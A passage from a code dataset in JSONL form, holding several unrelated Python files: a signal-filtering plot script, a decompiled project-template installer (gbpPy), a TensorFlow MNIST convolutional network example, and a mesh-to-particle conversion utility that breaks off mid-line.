butter_highpass_filter(lp3, 0.01, 200)\n\nb1 = butter_bandpass_filter(subject1, 0.01, 50.0, 200)\nb1fix = butter_bandpass_filter(subject1, 0.01, 50.0, 200, order=4)\n\nplt.plot(hp1, label='Subject 1')\nplt.plot(hp2, label='Subject 2')\nplt.plot(hp3, label='Subject 3')\nplt.ylabel('Amplitude [mV]')\nplt.xlabel('Samples')\nplt.legend()\nplt.title('Raw signals filtered')\nplt.show()\n\n\n#plt.plot(subject2)\nplt.plot(hp1, label='lowpass + highpass')\n#plt.plot(hp2, label='Subject 2')\n#plt.plot(hp3, label='Subject 3')\n#plt.plot(b1, label='bandpass1')\nplt.plot(b1, label='order5')\nplt.plot(b1fix, label='order4')\n#plt.plot(b2, label='bandpass2')\nplt.ylabel('Amplitude [mV]')\nplt.xlabel('Samples')\nplt.legend()\nplt.title('Raw signals filtered')\nplt.show()\n\"\"\"","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"459545692","text":"\n\ndef neon(lista):\n naj = 0\n pom = lista[0]\n for x in lista[1:]:\n pom = pom+2\n naj = max(naj,pom +x)\n pom = max(pom,x)\n return naj\n\nprint(neon([1,10,1]))\n\n","sub_path":"logia/neony_liniowo.py","file_name":"neony_liniowo.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"313252469","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /anaconda/lib/python3.5/site-packages/gbpPy/templates.py\n# Compiled at: 2018-01-18 01:22:07\n# Size of source mod 2**32: 24343 bytes\nimport gbpPy.log as SID, shutil, os, re, filecmp\n\ndef rreplace(s, old, new, occurrence):\n li = s.rsplit(old, occurrence)\n return new.join(li)\n\n\ndef check_and_remove_trailing_occurance(txt_in, occurance):\n n_occurance = len(occurance)\n if txt_in[-n_occurance:] == occurance:\n txt_out = txt_in[0:-n_occurance]\n flag_found = True\n else:\n txt_out = txt_in\n flag_found = False\n return (\n txt_out, flag_found)\n\n\ndef get_base_name(project_dir_abs):\n head, tail = os.path.split(project_dir_abs)\n if tail == '':\n head, tail = os.path.split(head)\n return tail\n\n\n_protected_inputs = [\n '_PARAMETERS.key', '_PARAMETERS.value']\n\nclass project_inputs:\n\n def __init__(self, user_params):\n self.list = []\n self.list.append({'name': '_PARAMETERS.key', 'input': [key for key in user_params.keys()]})\n self.list.append({'name': '_PARAMETERS.value', 'input': [val for val in user_params.values()]})\n for input_name_i in _protected_inputs:\n input_check = self.get_input(input_name_i)\n if not input_check:\n SID.error('Failed to add protected input {%s} to the project parameter list.' % input_name_i)\n\n for param_i_key, param_i_value in user_params.items():\n if hasattr(param_i_value, '__iter__') and not isinstance(param_i_value, str):\n self.list.append({'name': param_i_key, 'input': param_i_value})\n else:\n self.list.append({'name': param_i_key, 'input': [param_i_value]})\n\n def get_input(self, name_get):\n input_return = None\n for input_i in self.list:\n if input_i['name'] == name_get:\n input_return = input_i\n break\n\n return input_return\n\n def get_value(self, name_get, idx=0):\n input_get = self.get_input(name_get)\n if not input_get:\n SID.error('Failed to find requested parameter {%s} in project parameter list.' % name_get)\n if abs(idx) >= len(input_get):\n SID.error('Requested input index {%d} exceeds allowed bounds of paramerer {%s; size=%d}.' % (idx, name_get, size(input_get)))\n return input_get[idx]\n\n\ndef find_parameter_references(line):\n regex = re.compile('%[\\\\w:.]*%')\n matches = []\n for match in regex.finditer(line):\n param = {}\n directive = match.group().strip('%')\n if directive not in _protected_inputs:\n param['name'] = directive\n param['span'] = match.span()\n matches.append(param)\n\n return matches\n\n\ndef _perform_parameter_substitution_ith(line, params, idx=None):\n line_new = line\n regex = re.compile('%[\\\\w:.]*%')\n match = regex.search(line_new)\n n_lines = 1\n while match:\n directive = match.group().strip('%')\n param_insert = params.get_input(directive)\n param_insert_size = len(param_insert['input'])\n if param_insert_size > 1:\n if n_lines == 1:\n n_lines = param_insert_size\n else:\n if param_insert_size != 1 and n_lines != param_insert_size:\n SID.error('There is an input list size incompatibility (%d!=%d) in {%s}.' % (n_lines, param_insert_size, line))\n if idx == None:\n line_new = line_new[0:match.start()] + str(param_insert['input'][0]) + line_new[match.end():]\n else:\n line_new = line_new[0:match.start()] + str(param_insert['input'][idx]) + line_new[match.end():]\n match = regex.search(line_new)\n\n if idx == None:\n return (n_lines, line_new)\n else:\n return line_new\n\n\ndef perform_parameter_substitution(line, params):\n n_lines, line_new = _perform_parameter_substitution_ith(line, params)\n lines_new = []\n if n_lines > 1:\n for idx in range(n_lines):\n lines_new.append(_perform_parameter_substitution_ith(line, params, idx=idx))\n\n else:\n lines_new.append(line_new)\n return lines_new\n\n\ndef format_template_names(name_list):\n name_txt = ''\n for i_name, name_i in enumerate(name_list):\n if i_name == 0:\n name_txt += name_i\n else:\n name_txt += ',' + name_i\n\n return name_txt\n\n\ndef update_element(element, update):\n return update == None or update == element.template_path_out()\n\n\nclass template_directory:\n\n def __init__(self, dirname_template, dirname):\n if not os.path.isdir(dirname):\n raise IsADirectoryError('Directory name {%s} passed to template_directory constructor does not point to a valid directory.' % dirname)\n dirname_rel_template = os.path.normpath(os.path.relpath(os.path.abspath(dirname), dirname_template))\n self.parse_name(dirname_rel_template)\n self._template_path = os.path.normpath(os.path.dirname(dirname_rel_template))\n self._full_path_in_abs = os.path.abspath(dirname)\n self.files = []\n self.dirname_template = dirname_template\n if os.path.islink(dirname):\n self.is_symlink = True\n else:\n self.is_symlink = False\n\n def parse_name(self, dirname_rel_template):\n self.name_in = os.path.basename(dirname_rel_template)\n self.name_out = self.name_in.replace('_dot_', '.', 1)\n self.name_out, self.is_link = check_and_remove_trailing_occurance(self.name_out, '.link')\n\n def is_root(self):\n return os.path.realpath(self.full_path_in()) == os.path.realpath(self.dirname_template)\n\n def full_path_in(self):\n return os.path.normpath(self._full_path_in_abs)\n\n def full_path_out(self, dir_install):\n return os.path.normpath(os.path.normpath(os.path.join(dir_install, self._template_path, self.name_out)))\n\n def template_path_in(self):\n return os.path.normpath(os.path.join(self._template_path, self.name_in))\n\n def template_path_out(self):\n return os.path.normpath(os.path.join(self._template_path, self.name_out))\n\n def install(self, dir_install, silent=False):\n try:\n if not self.is_root():\n if os.path.isdir(self.full_path_out(dir_install)):\n SID.log.open('Directory %s exists.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n symlink_path = os.path.relpath(self.full_path_in(), os.path.dirname(self.full_path_out(dir_install)))\n if not silent:\n if self.is_link:\n if os.path.lexists(self.full_path_out(dir_install)):\n os.unlink(self.full_path_out(dir_install))\n os.symlink(symlink_path, self.full_path_out(dir_install))\n SID.log.open('Directory %s link updated.' % self.full_path_out(dir_install))\n else:\n os.symlink(symlink_path, self.full_path_out(dir_install))\n SID.log.open('Directory %s linked.' % self.full_path_out(dir_install))\n else:\n os.mkdir(self.full_path_out(dir_install))\n SID.log.open('Directory %s created.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n SID.log.open('Directory %s linked silently.' % self.full_path_out(dir_install))\n else:\n SID.log.open('Directory %s created silently.' % self.full_path_out(dir_install))\n else:\n if os.path.isdir(self.full_path_out(dir_install)):\n SID.log.open('Directory %s -- root valid.' % self.full_path_out(dir_install))\n else:\n raise NotADirectoryError\n except:\n SID.log.error('Failed to install directory {%s}.' % self.full_path_out())\n\n def uninstall(self, dir_install, silent=False):\n try:\n if not self.is_root():\n if not os.path.isdir(self.full_path_out(dir_install)):\n SID.log.close('Not found.')\n else:\n if not silent:\n if self.is_link:\n os.unlink(self.full_path_out(dir_install))\n SID.log.close('Unlinked.')\n else:\n os.rmdir(self.full_path_out(dir_install))\n SID.log.close('Removed.')\n else:\n if self.is_link:\n SID.log.close('Unlinked silently.')\n else:\n SID.log.close('Removed silently.')\n else:\n SID.log.close('Root ignored.')\n except:\n SID.log.error('Failed to uninstall directory {%s}.' % self.name_out)\n\n\nclass template_file:\n\n def __init__(self, filename, dir_host):\n if not dir_host:\n dir_host = template_directory('.')\n self.parse_name(filename)\n self.dir_in = dir_host\n if not os.path.isfile(self.full_path_in()):\n raise FileNotFoundError('File name {%s} passed to template_file constructor does not point to a valid file.' % self.full_path_in())\n if os.path.islink(filename):\n self.is_symlink = True\n else:\n self.is_symlink = False\n\n def parse_name(self, filename):\n self.name_in = filename\n self.name_out = self.name_in.replace('_dot_', '.', 1)\n self.name_out, self.is_link = check_and_remove_trailing_occurance(self.name_out, '.link')\n if not self.is_link:\n self.name_out, self.is_template = check_and_remove_trailing_occurance(self.name_out, '.template')\n else:\n self.is_template = False\n\n def full_path_in(self):\n return os.path.normpath(os.path.join(self.dir_in.full_path_in(), self.name_in))\n\n def full_path_out(self, dir_install):\n return os.path.normpath(os.path.join(self.dir_in.full_path_out(dir_install), self.name_out))\n\n def template_path_in(self):\n return os.path.normpath(os.path.join(self.dir_in.template_path_in(), self.name_in))\n\n def template_path_out(self):\n return os.path.normpath(os.path.join(self.dir_in.template_path_out(), self.name_out))\n\n def install(self, dir_install, params=None, silent=False):\n project_params = project_inputs(params)\n try:\n if os.path.isfile(self.full_path_out(dir_install)):\n SID.log.comment(' --> %s exists.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n symlink_path = os.path.relpath(self.full_path_in(), self.dir_in.full_path_out(dir_install))\n if not silent:\n if self.is_link:\n if os.path.lexists(self.full_path_out(dir_install)):\n os.unlink(self.full_path_out(dir_install))\n os.symlink(symlink_path, self.full_path_out(dir_install))\n SID.log.comment('--> %s link updated.' % self.full_path_out(dir_install))\n else:\n os.symlink(symlink_path, self.full_path_out(dir_install))\n SID.log.comment('--> %s linked.' % self.full_path_out(dir_install))\n else:\n self.write_with_substitution(dir_install, params=project_params)\n SID.log.comment('--> %s created.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n SID.log.comment('--> %s linked silently.' % self.full_path_out(dir_install))\n else:\n SID.log.comment('--> %s created silently.' % self.full_path_out(dir_install))\n except:\n SID.log.error('Failed to install file {%s}.' % self.full_path_out(dir_install))\n\n def uninstall(self, dir_install, silent=False):\n try:\n if not os.path.isfile(self.full_path_out(dir_install)):\n SID.log.comment('--> %s not found.' % self.full_path_out(dir_install))\n else:\n if not silent:\n if self.is_link:\n os.unlink(self.full_path_out(dir_install))\n SID.log.comment('--> %s unlinked.' % self.full_path_out(dir_install))\n else:\n os.remove(self.full_path_out(dir_install))\n SID.log.comment('--> %s removed.' % self.full_path_out(dir_install))\n else:\n if self.is_link:\n SID.log.comment('--> %s unlinked silently.' % self.full_path_out(dir_install))\n else:\n SID.log.comment('--> %s removed silently.' % self.full_path_out(dir_install))\n except:\n SID.log.error('Failed to uninstall file {%s}.' % self.full_path_out(dir_install))\n\n def write_with_substitution(self, dir_install, params=None):\n try:\n if self.is_link:\n os.symlink(os.path.relpath(self.full_path_in(), os.path.dirname(self.full_path_out(dir_install))), self.full_path_out(dir_install))\n elif self.is_template:\n with open(self.full_path_in(), 'r') as (fp_in):\n with open(self.full_path_out(dir_install), 'w') as (fp_out):\n for line_in in fp_in:\n for line_out in perform_parameter_substitution(line_in, params):\n fp_out.write(line_out)\n\n else:\n shutil.copy2(self.full_path_in(), self.full_path_out(dir_install))\n except:\n SID.log.error('Failed write template file {%s}.' % self.name_in)\n\n\nclass template:\n\n def __init__(self, template_name=None, path=None):\n self.path = []\n self.dir = []\n self.name = []\n self.directories = []\n if template_name != None:\n self.add(template_name, path=path)\n\n def add(self, template_name, path=None):\n if not path:\n path = os.environ.get('GBPPY_TEMPLATE_PATH')\n if not path:\n path = './templates/'\n path_list = path.split(':')\n template_dir_abs = None\n for path_i in path_list:\n dir_test = os.path.join(path_i, template_name)\n if os.path.isdir(dir_test):\n template_dir_abs = dir_test\n break\n\n if not template_dir_abs:\n raise IsADirectoryError(\"Could not find template '%s' in template path {%s}\" % (template_name, path))\n template_path_dir, template_name = os.path.split(template_dir_abs)\n self.path.append(template_path_dir)\n self.dir.append(template_dir_abs)\n self.name.append(template_name)\n SID.log.open(\"Loading template {'%s' from %s}...\" % (self.name[(-1)], self.path[(-1)]))\n n_template_files = 0\n for root, dirs, files in os.walk(self.dir[(-1)]):\n dir_new = template_directory(self.dir[(-1)], root)\n self.add_directory(dir_new)\n for test_dir_i in os.listdir(root):\n test_dir = os.path.join(dir_new.full_path_in(), test_dir_i)\n if os.path.islink(test_dir) and os.path.isdir(test_dir):\n self.add_directory(template_directory(self.dir[(-1)], test_dir))\n\n for file_i in files:\n file_new = template_file(file_i, dir_new)\n if file_new.is_template:\n n_template_files += 1\n self.add_file(file_new)\n\n if n_template_files > 0:\n SID.log.open('Scanning template files for parameters...')\n self.params = set()\n for dir_i in self.directories:\n for file_i in [f for f in dir_i.files if f.is_template]:\n with open(file_i.full_path_in(), 'r') as (file_in):\n for line in file_in:\n param_refs = find_parameter_references(line)\n for param_ref_i in param_refs:\n self.params.add(param_ref_i['name'])\n\n SID.log.close('Done')\n self.print()\n SID.log.close('Done')\n\n def get_directory(self, template_path_out):\n for dir_i in self.directories:\n if dir_i.template_path_out() == template_path_out:\n return dir_i\n\n def get_file(self, template_path_out):\n for dir_i in self.directories:\n for file_i in dir_i.files:\n if file_i.template_path_out() == template_path_out:\n return file_i\n\n def add_directory(self, dir_add):\n dir_check = self.get_directory(dir_add.template_path_out())\n if dir_check == None:\n self.directories.append(dir_add)\n\n def add_file(self, file_add):\n if file_add.dir_in.is_symlink:\n raise Exception('Can not add file {%s} to symlinked directory {%s}.' % (file_add.name_in, file_add.dir_in.name_in))\n dir_check = self.get_directory(file_add.dir_in.template_path_out())\n if dir_check == None:\n dir_out = file_add.dir_in\n else:\n dir_out = dir_check\n file_check = self.get_file(file_add.template_path_out())\n if file_check != None:\n if not filecmp.cmp(file_add.full_path_in(), file_check.full_path_in()):\n SID.log.error(\"There is a file incompatability between template files '%s' and '%s'.\" % (file_add.full_path_in(), file_check.full_path_in()))\n if file_check == None:\n dir_out.files.append(file_add)\n\n def n_files(self):\n n_files = 0\n for dir_i in self.directories:\n n_files += len(dir_i.files)\n\n return n_files\n\n def print(self):\n SID.log.open('Template contents:')\n SID.log.comment('n_directories=%d' % len(self.directories))\n SID.log.comment('n_files =%d' % self.n_files())\n SID.log.comment('n_parameters =%d' % len(self.params))\n for param_ref_i in self.params:\n SID.log.comment(' --> %s' % param_ref_i)\n\n for dir_i in sorted(self.directories, key=lambda dir_j: len(dir_j.template_path_out())):\n SID.log.open('Directory {%s}:' % dir_i.template_path_out())\n for file_i in sorted(dir_i.files, key=lambda file_j: file_j.template_path_out()):\n SID.log.comment('--> %s' % file_i.template_path_out())\n\n SID.log.close()\n\n SID.log.close()\n\n def _process_template(self, dir_install, params=None, uninstall=False, silent=False, update=None):\n name_txt = format_template_names(self.name)\n if not uninstall:\n if len(self.name) > 1:\n SID.log.open('Installing templates {%s} to {%s}...' % (name_txt, dir_install))\n else:\n SID.log.open('Installing template {%s} to {%s}...' % (name_txt, dir_install))\n flag_reverse_sort = False\n else:\n flag_reverse_sort = True\n if len(self.name) > 1:\n SID.log.open('Uninstalling templates {%s} from {%s}...' % (name_txt, dir_install))\n else:\n SID.log.open('Uninstalling template {%s} from {%s}...' % (name_txt, dir_install))\n for dir_i in sorted(self.directories, key=lambda k: len(k._full_path_in_abs), reverse=flag_reverse_sort):\n if not uninstall and update_element(dir_i, update):\n dir_i.install(dir_install, silent=silent)\n elif update_element(dir_i, update):\n SID.log.open('Uninstalling directory %s...' % dir_i.full_path_out(dir_install))\n for file_i in dir_i.files:\n if uninstall and update_element(file_i, update):\n file_i.uninstall(dir_install, silent=silent)\n elif update_element(file_i, update):\n file_i.install(dir_install, params=params, silent=silent)\n\n if uninstall and update_element(dir_i, update):\n dir_i.uninstall(dir_install, silent=silent)\n elif update_element(dir_i, update):\n SID.log.close()\n\n SID.log.close('Done.')\n\n def install(self, dir_out, params=None, silent=False, update=None):\n for param_i in self.params:\n if param_i not in params:\n SID.log.error('Required parameter {%s} is not present in template installation dictionary.' % param_i)\n\n self._process_template(dir_out, params=params, silent=silent, update=update)\n\n def uninstall(self, dir_out, silent=False, update=None):\n self._process_template(dir_out, uninstall=True, silent=silent, update=update)","sub_path":"pycfiles/gbpPy-0.1.macosx-10.6-x86_64.tar/templates.cpython-35.py","file_name":"templates.cpython-35.py","file_ext":"py","file_size_in_byte":21161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"531810136","text":"# This example is based on the tutorial from tensorflow. It uses a deep convolutional network to solve the mnist problem.\n# I've only added lines to transform my data into something ~= mnist dataset of the tutorial\n# Precision : 99.28 % \n#\n# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#\t\t http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"A very simple MNIST classifier.\nSee extensive documentation at\nhttp://tensorflow.org/tutorials/mnist/beginners/index.md\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\nimport gzip\nimport pickle\n\nimport tensorflow as tf\n\nFLAGS = None\n\ndef convert_to_hot_vector(numbers):\n\tmy_hot_vector = len(numbers)*[10*[0]]\n\tfor i in range(len(numbers)):\n\t\tmy_hot_vector[i] = tuple(hot_vector(numbers[i]))\n\tmy_hot_vector = tuple(my_hot_vector)\n\treturn my_hot_vector\n\ndef hot_vector(number):\n\tmy_vector = 10*[0]\n\tmy_vector[number] = 1\n\treturn my_vector\n\n# see https://www.tensorflow.org/get_started/mnist/pros\n\ndef weight_variable(shape):\n\tinitial = tf.truncated_normal(shape, stddev=0.1)\n\treturn tf.Variable(initial)\n\ndef bias_variable(shape):\n\tinitial = tf.constant(0.1, shape=shape)\n\treturn tf.Variable(initial)\n\ndef conv2d(x, W):\n\treturn tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef max_pool_2x2(x):\n\treturn tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n\t\t\t\t\t\t\t\t\t\t\t\tstrides=[1, 2, 2, 1], padding='SAME')\n\ndef nextbatch(x,i,j):\n\tl = len(x)\n\twhile(j>l):\n\t\tj=j-l\n\t\ti=i-l\n\treturn x[i:j]\n\nif __name__ == '__main__':\n\t# Import data\n\twith gzip.open('mnist.pkl.gz', 'rb') as f:\n\t\ttrain_set, valid_set, test_set = pickle.load(f)\n\t\ttrain_x, train_y = train_set\n\t\ttrain_y = convert_to_hot_vector(train_y)\n\t\tvalid_x, valid_y = valid_set\n\t\ttest_x, test_y = test_set\n\t\ttest_y = convert_to_hot_vector(test_y)\n\n\t# Create the model\n\tx = tf.placeholder(tf.float32, [None, 784])\n\tW = tf.Variable(tf.zeros([784, 10]))\n\tb = tf.Variable(tf.zeros([10]))\n\ty = tf.matmul(x, W) + b\n\n\t# Define loss and optimizer\n\ty_ = tf.placeholder(tf.float32, [None, 10])\n\n\tsess = tf.InteractiveSession()\n\n\tW_conv1 = weight_variable([5, 5, 1, 32])\n\tb_conv1 = bias_variable([32])\n\n\tx_image = tf.reshape(x, [-1,28,28,1])\n\n\th_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n\th_pool1 = max_pool_2x2(h_conv1)\n\n\tW_conv2 = weight_variable([5, 5, 32, 64])\n\tb_conv2 = bias_variable([64])\n\n\th_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\th_pool2 = max_pool_2x2(h_conv2)\n\n\tW_fc1 = weight_variable([7 * 7 * 64, 1024])\n\tb_fc1 = bias_variable([1024])\n\n\th_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n\th_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n\tkeep_prob = tf.placeholder(tf.float32)\n\th_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n\tW_fc2 = weight_variable([1024, 10])\n\tb_fc2 = bias_variable([10])\n\n\ty_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\n\n\tcross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n\ttrain_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\tcorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\tsess.run(tf.global_variables_initializer())\n\tfor i in range(20000):\n\t\ttrain_x_batch = nextbatch(train_x,i*50,(i+1)*50)\n\t\ttrain_y_batch = nextbatch(train_y,i*50,(i+1)*50)\n\t\tif (i%100 == 0) and (i != 0):\n\t\t\ttrain_accuracy = accuracy.eval(feed_dict={x:train_x_batch, y_: train_y_batch, keep_prob: 1.0})\n\t\t\tprint(\"step %d, training accuracy %g\"%(i, train_accuracy))\n\t\ttrain_step.run(feed_dict={x: train_x_batch, y_: train_y_batch, keep_prob: 0.5})\n\tprint(\"test accuracy %g\"%accuracy.eval(feed_dict={x: test_x, y_: test_y, keep_prob: 1.0}))\n\n","sub_path":"mnist/mnist_tf_deep.py","file_name":"mnist_tf_deep.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"478590072","text":"import numpy as np\nimport os\nimport trimesh\nimport copy\nimport matplotlib.pyplot as plt\n#import binvox_rw as binvox_rw\nimport math\nimport net_utils.basic as utils_basic\n\nimport ipdb\nst = ipdb.set_trace\n\ndef calc_rigid_transform(XX, YY):\n X = XX.copy().T\n Y = YY.copy().T\n\n mean_X = np.mean(X, 1, keepdims=True)\n mean_Y = np.mean(Y, 1, keepdims=True)\n X = X - mean_X\n Y = Y - mean_Y\n C = np.dot(X, Y.T)\n U, S, Vt = np.linalg.svd(C)\n D = np.eye(3)\n D[2, 2] = np.linalg.det(np.dot(Vt.T, U.T))\n R = np.dot(Vt.T, np.dot(D, U.T))\n T = mean_Y - np.dot(R, mean_X)\n\n '''\n YY_fitted = (np.dot(R, XX.T) + T).T\n print(\"MSE fit\", np.mean(np.square(YY_fitted - YY)))\n '''\n\n return R, T\n\n\ndef save_obj(vertices: np.ndarray, faces: np.ndarray, filepath: str):\n with open(filepath, 'w') as f:\n f.write(\"# OBJ file\\n\")\n for v in vertices:\n f.write(\"v %.4f %.4f %.4f\\n\" % (v[0],v[1],v[2]))\n for face in faces:\n f.write(\"f\")\n for vertex in face:\n f.write(\" %d\" % (vertex + 1))\n f.write(\"\\n\")\n\n\ndef as_mesh(scene_or_mesh):\n \"\"\"\n Convert a possible scene to a mesh.\n\n If conversion occurs, the returned mesh has only vertex and face data.\n \"\"\"\n if isinstance(scene_or_mesh, trimesh.Scene):\n if len(scene_or_mesh.geometry) == 0:\n mesh = None # empty scene\n else:\n # we lose texture information here\n mesh = trimesh.util.concatenate(\n tuple(trimesh.Trimesh(vertices=g.vertices, faces=g.faces)\n for g in scene_or_mesh.geometry.values()))\n else:\n assert(isinstance(scene_or_mesh, trimesh.Trimesh))\n mesh = scene_or_mesh\n return mesh\n\n\n#filename = \"/home/htung/Documents/2021/example_meshes/0000_obj1_1.binvox\"\n\ndef split_intrinsics(K):\n # K is B x 3 x 3 or B x 4 x 4\n fx = K[:,0,0]\n fy = K[:,1,1]\n x0 = K[:,0,2]\n y0 = K[:,1,2]\n return fx, fy, x0, y0\n\ndef apply_4x4(RT, XYZ):\n \"\"\"\n RT: B x 4 x 4\n XYZ: B x N x 3\n \"\"\"\n B, N, _ = XYZ.shape\n ones = np.ones([B, N, 1])\n XYZ1 = np.concatenate([XYZ, ones], 2)\n XYZ1_t = np.transpose(XYZ1, (0, 2, 1))\n # this is B x 4 x N\n\n XYZ2_t = np.matmul(RT, XYZ1_t)\n XYZ2 = np.transpose(XYZ2_t, (0, 2, 1))\n XYZ2 = XYZ2[:,:,:3]\n return XYZ2\n\n\ndef Pixels2CameraSingle(x, y, z, fx, fy, x0, y0):\n # x, y are N,\n # z is corresponding depth so it is N,\n # fx, fy, x0, y0 are all N,\n EPS = 1e-6\n x = ((z+EPS)/fx)*(x-x0)\n y = ((z+EPS)/fy)*(y-y0)\n xyz = np.stack([x,y,z], axis=1)\n return xyz\n\n\ndef Pixels2Camera(x,y,z,fx,fy,x0,y0):\n # x and y are locations in pixel coordinates, z is a depth image in meters\n # their shapes are B x H x W\n # fx, fy, x0, y0 are scalar camera intrinsics\n # returns xyz, sized [B,H*W,3]\n # there is no randomness here\n\n B, H, W = list(z.shape)\n\n fx = np.reshape(fx, [B,1,1])\n fy = np.reshape(fy, [B,1,1])\n x0 = np.reshape(x0, [B,1,1])\n y0 = np.reshape(y0, [B,1,1])\n\n # unproject\n EPS = 1e-6\n x = ((z+EPS)/fx)*(x-x0)\n y = ((z+EPS)/fy)*(y-y0)\n\n x = np.reshape(x, [B,-1])\n y = np.reshape(y, [B,-1])\n z = np.reshape(z, [B,-1])\n xyz = np.stack([x,y,z], axis=2)\n return xyz\n\ndef get_intrinsics_from_projection_matrix(proj_matrix, size):\n H, W = size\n vfov = 2.0 * math.atan(1.0/proj_matrix[1][1]) * 180.0/ np.pi\n vfov = vfov / 180.0 * np.pi\n tan_half_vfov = np.tan(vfov / 2.0)\n tan_half_hfov = tan_half_vfov * H / float(H)\n fx = W / 2.0 / tan_half_hfov # focal length in pixel space\n fy = H / 2.0 / tan_half_vfov\n\n pix_T_cam = np.array([[fx, 0, W / 2.0],\n [0, fy, H / 2.0],\n [0, 0, 1]])\n return pix_T_cam\n\n\n\ndef get_depth_values(image: np.array, depth_pass: str = \"_depth\", width: int = 256, height: int = 256, near_plane: float = 0.1, far_plane: float = 100) -> np.array:\n \"\"\"\n Get the depth values of each pixel in a _depth image pass.\n The far plane is hardcoded as 100. The near plane is hardcoded as 0.1.\n (This is due to how the depth shader is implemented.)\n :param image: The image pass as a numpy array.\n :param depth_pass: The type of depth pass. This determines how the values are decoded. Options: `\"_depth\"`, `\"_depth_simple\"`.\n :param width: The width of the screen in pixels. See output data `Images.get_width()`.\n :param height: The height of the screen in pixels. See output data `Images.get_height()`.\n :param near_plane: The near clipping plane. See command `set_camera_clipping_planes`. The default value in this function is the default value of the near clipping plane.\n :param far_plane: The far clipping plane. See command `set_camera_clipping_planes`. The default value in this function is the default value of the far clipping plane.\n :return An array of depth values.\n \"\"\"\n image = np.flip(np.reshape(image, (height, width, 3)), 1)\n\n # Convert the image to a 2D image array.\n if depth_pass == \"_depth\":\n depth_values = np.array((image[:, :, 0] + image[:, :, 1] / 256.0 + image[:, :, 2] / (256.0 ** 2)))\n elif depth_pass == \"_depth_simple\":\n depth_values = image[:, :, 0] / 256.0\n else:\n raise Exception(f\"Invalid depth pass: {depth_pass}\")\n # Un-normalize the depth values.\n return (depth_values * ((far_plane - near_plane) / 256.0)).astype(np.float32)\n\ndef depth2pointcloud(z, pix_T_cam):\n B, C, H, W = list(z.shape) # this is 1, 1, H, W\n y, x = utils_basic.meshgrid2D_py(H, W)\n y = np.repeat(y[np.newaxis, :, :], B, axis=0)\n x = np.repeat(x[np.newaxis, :, :], B, axis=0)\n z = np.reshape(z, [B, H, W])\n fx, fy, x0, y0 = split_intrinsics(pix_T_cam)\n xyz = Pixels2Camera(x, y, z, fx, fy, x0, y0)\n return xyz\n\n\ndef mesh_to_particles(mesh_filename, spacing=0.2, visualization=False, remove_outofbbox_pts=True):\n \"\"\"\n mesh_filename:\"/home/htung/Documents/2021/example_meshes/Rubber_duck.obj\"\n spacing: the size of the voxel grid in real-world scale # what is the distance between 2 particles\n \"\"\"\n\n # the output path used by binvox\n output_binvox_filename = mesh_filename.replace(\".obj\", \".binvox\")\n # check if output file exists\n assert not os.path.isfile(output_binvox_filename), f\"binvox file {output_binvox_filename} exists, please delete it first\"\n\n #load mesh\n mesh = as_mesh(trimesh.load_mesh(mesh_filename, process=True))\n # make the mesh transparent\n mesh_ori = copy.deepcopy(mesh) # for visualization\n mesh_ori.visual.face_colors[:,3] = 120\n\n\n\n edges = mesh.bounding_box.extents\n maxEdge = max(edges)\n meshLower0 = mesh.bounds[0,:]\n meshUpper0 = mesh.bounds[1,:]\n\n # shift the mesh to it is in some bounding box [0, +x], [0, +y], [0, +z]\n #mesh.vertices -= meshLower0\n\n\n edges = mesh.bounding_box.extents\n maxEdge = max(edges)\n meshLower = mesh.bounds[0,:]\n meshUpper = mesh.bounds[1,:]\n # tweak spacing to avoid edge cases for particles laying on the boundary\n # just covers the case where an edge is a whole multiple of the spacing.\n spacingEps = spacing*(1.0 - 1e-4)\n spacingEps_p = 0 #(9e-4) if spacing >= 0.001 else 0\n\n\n # naming is confusing, dx denotes the number of voxels in each dimension\n # make sure to have at least one particle in each dimension\n dx = 1 if spacing > edges[0] else int(edges[0]/spacingEps)\n dy = 1 if spacing > edges[1] else int(edges[1]/spacingEps)\n dz = 1 if spacing > edges[2] else int(edges[2]/spacingEps)\n\n maxDim = max(max(dx, dy), dz);\n\n #expand border by two voxels to ensure adequate sampling at edges\n # extending by a small offset to avoid point sitting exactly on the boundary\n meshLower_spaced = meshLower - 2.0 * spacing - spacingEps_p\n meshUpper_spaced = 